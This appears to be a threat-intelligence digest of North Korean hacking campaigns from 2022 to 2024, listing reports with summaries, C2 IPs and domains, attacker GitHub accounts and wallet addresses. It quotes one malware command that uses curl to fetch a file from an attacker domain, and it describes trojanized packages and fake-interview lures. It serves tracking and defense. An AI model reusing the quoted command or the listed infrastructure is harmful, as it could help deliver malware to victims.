    • 155.138.219[.]140 (2022-07-17 - 2022-08-16)

Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

  • Date:: 2023-06-06
  • Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
  • https://sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/

North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US

Report: North Korean Hackers Have Stolen $3 Billion Worth of Crypto

Andariel’s silly mistakes and a new malware family

Recorded Future: North Korea’s Cyber Strategy

Phylum: Sophisticated Ongoing Attack on NPM

How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

The DPRK strikes using a new variant of RUSTBUCKET

  • Date:: 2023-07-13
  • https://elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
  • RustBucket, Bluenoroff, DangerousPassword
  • do shell script "curl -o \"/users/shared/Potential Risks of Cryptocurrency Assets.pdf\" https://crypto.hondchain.com/OuhVX8sdV21/HBKPHFlbyt/9zkMp5L5HS/fP7saoS3GZ/7fVinrx -A cur1-agent"
  • 104.168.167[.]88
  • C2:: crypto.hondchain[.]com
  • C2:: starbucls[.]xyz
  • C2:: jaicvc[.]com
  • C2:: docsend.linkpc[.]net (dynamic DNS domain)

GitHub Security Alert: Social engineering campaign targets technology industry employees

The CoinsPaid Hack Explained: We Know Exactly How Attackers Stole and Laundered $37M USD

Mandiant: North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack (JumpCloud)

  • Date:: 2023-07-24
  • https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/
  • UNC4899, TraderTraitor, ExpressVPN, JumpCloud, Trading Technologies, X_TRADER, 3CX
  • 175.45.178[.]0/24 (Ryugyong Dong)
  • 146.19.173.125
  • 23.227.202.54
  • 38.132.124.88
  • 88.119.174.148
  • 198.244.135.250
  • contortonset[.]com
  • relysudden[.]com
  • primerosauxiliosperu[.]com
  • rentedpushy[.]com
  • basketsalute[.]com
  • prontoposer[.]com

Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures

Kimsuky - Spreading malware disguised as coin and investment-related content

ReversingLabs: VMConnect - Malicious PyPI packages imitate popular open source modules

  • Date:: 2023-08-03
  • https://reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules
  • New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
  • When we decode the string, we discovered that it contains a download URL which is modified based on the information collected from the host machine. The substring paperpin3902 in the command and control URL is replaced with a string containing the first letter of the host’s platform name, username and a random, 6 character-long string.
  • C2:: 45.61.139[.]219
  • C2:: ethertestnet[.]pro
  • C2:: deliworkshopexpress[.]xyz

FBI Identifies Cryptocurrency Funds Stolen by DPRK

US arrests Tornado Cash co-founder, sanctions another who remains at large

Lazarus Group's infrastructure reuse leads to discovery of new malware

VMConnect supply chain attack continues, evidence points to North Korea

Mandiant: APT38 - Un-usual Suspects

Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company

Active North Korean campaign targeting security researchers

  • Date:: 2023-09-07
  • In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0- day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
  • https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/

Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry

  • Date:: 2023-09-18
  • https://paper.seebug.org/3033/
  • This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
  • The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:

Lazarus Group’s Undercover Operations 2022–2023 - L. Taewoo, S. Lee & D. Kim

How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs

TeamCity CVE-2023-42793 / CyberLink Supply Chain Attack

Lazarus’ New Campaign Exploiting Legitimate Software

Deep Dive into the Lazarus Group's Foray into macOS

  • Date:: 2023-10-29
  • https://slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos
  • This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.

FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application

  • Date:: 2023-10-30
  • Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them
  • https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c

Lazarus Targets Bloackchain Engineers With New KandyKorn macOS Malware in attacks against blockchain engineers.

Kimsuky - Operation Covert Stalker

Crypto-Themed npm Packages Found Delivering Stealthy Malware

Microsoft: BlueNoroff hackers plan new crypto-theft attacks

Jamf - BlueNoroff strikes again with new macOS malware

Two South Koreans indicted for allegedly colluding with North Korean hackers

Palo Alto - Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors

Korean gov’t officials targeted by North’s ‘journalist’ crypto hackers

Microsoft:Diamond Sleet supply chain compromise distributes a modified CyberLink installer

  • Date:: 2023-11-22
  • https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/)
  • Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
  • If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
  • When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.

Operation Dream Magic, MagicLine4NX - Hackers use zero-day in supply-chain attack

FIOD + US Seizes Sinbad Crypto Mixer

US govt sanctions North Korea’s Kimsuky hacking group

Reuters: North Koreans use fake names, scripts to land remote IT work for cash

Alex Masmej Near Miss

Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

疑似Lazarus(APT-Q-1)涉及npm包供应链的攻击样本分析

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Koda's recent DPRK IoCs

To stem North Korea’s missiles program, White House looks to its hackers

Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks

"Obfuscated code a "recruiter" sent me"

Blockchain dev's wallet emptied in "job interview" using npm package

Phylum: Fake Developer Jobs Laced With Malware

  • Date:: 2023-12-20
  • https://blog.phylum.io/smuggling-malware-in-test-code/
  • npm package trying to masquerade as code profiler which actually installs several malicious scripts including a cryptocurrency and credential stealer
  • Attempted to hide the malicious code in a test file, presumably thinking that no one would bother to look for malware in test code.

2024

###: Phylum: Update to November’s Crypto-Themed npm Attack

###: Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023

###: North Korea Threat Landscape Update

###: Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises

###: CVE-2024-21338 - North Korea’s Lazarus deploys rootkit via AppLocker zero-day flaw

###: SquidSquad - Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

UN Security Council Report

  • Date:: 2024-03-07
  • According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys[.]store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.

MurAll Hacked by Contagious Interview

  • Date:: 2024-03-05
  • https://t.me/investigations/97
  • 0x01720163e9385e832fFe3387ba7098be4dF303e0
  • 0x0cDB613Ec9a07E2AFE898F8519a0c0a981032118
  • 0x0520195f57c3a5fe886aa95778dafe684854b78c252d20f29cbe0c9c4c4bbddd

"test_interview.zip": 39785213364b84c1442d133c778bf5472d76d8ef13b58b32b8dd8ac0201c82ca

The Lazarus group appears to be currently reaching out to targets via LinkedIn and spreading malware

SlowMist: Lazarus group appears to be currently reaching out to targets via LinkedIn and steal employee privileges or assets through malware

re: DPRK IT Workers

###: SquidSquad - How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023

Recruitment trap for blockchain practitioners: Analysis of suspected Lazarus (APT-Q-1) stealing operations

  • Date:: 2024-05-10
  • https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ
  • Contagious Interview, BeaverTail, InvisibleFerret
  • Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), disguised as employers, independent developers or startup founders, and publish job information with lucrative rewards or urgent tasks. The work content is usually software development or problem fixing.
  • Github:: plannet-plannet
  • Github:: bmstoreJ
  • Github:: CodePapaya
  • Github:: Allgoritex
  • Github:: bohinskamariia
  • Github:: danil33110
  • Github:: aluxiontemp
  • Github:: komeq1120
  • Github:: aufeine - Account active since 2024-04-15
  • Github:: dhayaprabhu - Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
  • Github:: MatheeshaMe - Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
  • Github:: Satyam-G5 - Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
  • Github:: emadmohd211 - Account active since 2021
  • Github:: alifarabi - Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
  • Bitbucket:: juandsuareza
  • Bitbucket:: freebling
  • C2:: 172.86.97[.]80:1224
  • C2:: 172.86.123[.]35:1244
  • C2:: 147.124.212[.]89:1244
  • C2:: 147.124.212[.]146:1244
  • C2:: 147.124.213[.]11:1244
  • C2:: 147.124.213[.]29:1244
  • C2:: 147.124.214[.]129:1244
  • C2:: 147.124.214[.]131:1244
  • C2:: 147.124.214[.]237:1244
  • C2:: 67.203.7[.]171:1244
  • C2:: 67.203.7[.]245:1244
  • C2:: 91.92.120[.]135:3000
  • C2:: 45.61.131[.]218:1245
  • C2:: 173.211.106[.]101:1245
  • Python Trojan, with C2 at 45.61.131[.]218:1245
  • Download a Python script for deploying AnyDesk from the URL "/adc/" of the first-stage C2 server (147.124.214[.]237:1244)

###: US court orders forfeiture of 279 crypto accounts tied to North Korea laundering

###: Exclusive: North Korea laundered $147.5 mln in stolen crypto in March, say UN experts

DPRK IT - Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says

Microsoft: Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks

From Opportunity to Threat: My Encounter with a Blockchain Job Scam

###: Mandiant: UNC4899 - Insights on Cyber Threats Targeting Users and Enterprises in Brazil

  • Date:: 2024-06-12
  • https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil
  • North Korean Government-Backed Groups Targeting Brazil
  • Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
  • In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
  • North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
  • One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
  • One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.

"Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry..."

Decipher: New Version of BeaverTail macOS Malware Identified

Patrick Wardle: This Meeting Should Have Been an Email (BeaverTail)

KnowBe4: How a North Korean Fake IT Worker Tried to Infiltrate Us

U.S. DOJ: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers (Andariel)

APT45: North Korea’s Digital Military Machine

Contagious Interview - Malicious npm Packages

North Korean threat actor Citrine Sleet exploiting Chromium zero-day (CVE-2024-7971)

APT Lazarus: Eager Crypto Beavers, Video calls and Games

  • Date:: 2024-09-04
  • https://group-ib.com/blog/apt-lazarus-python-scripts/
  • Contagious Interview, BeaverTail, InvisibleFerret, FCCCall
  • Recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated versions in Windows and Python releases
  • Campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as a Javascript malware in November 2023, but recently a native macOS version of BeaverTail was discovered in July 2024.
  • Actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork,and others
  • freeconference[.]io
  • mirotalk[.]net
  • The malicious Javascript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the “scripts” property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js.

Threat Assessment: North Korean Threat Groups

  • Date:: 2024-09-09
  • https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/
  • Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army.
  • Over the years, the RGB has revealed at least six threat groups

ReversingLabs: Fake recruiter coding tests target devs with malicious Python packages

  • Date:: 2024-09-10
  • https://reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages
  • New, malicious software packages believe to be linked to a campaign, VMConnect, first identified in August 2023
  • New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
  • The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the init.py file and its corresponding compiled Python file (PYC) inside the pycache directory of respective modules.
  • Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January, 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a “homework task.” The developer was asked to “find the bug,” resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that developer executed the project on his machine.
  • Github:: ponpon262612
  • https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html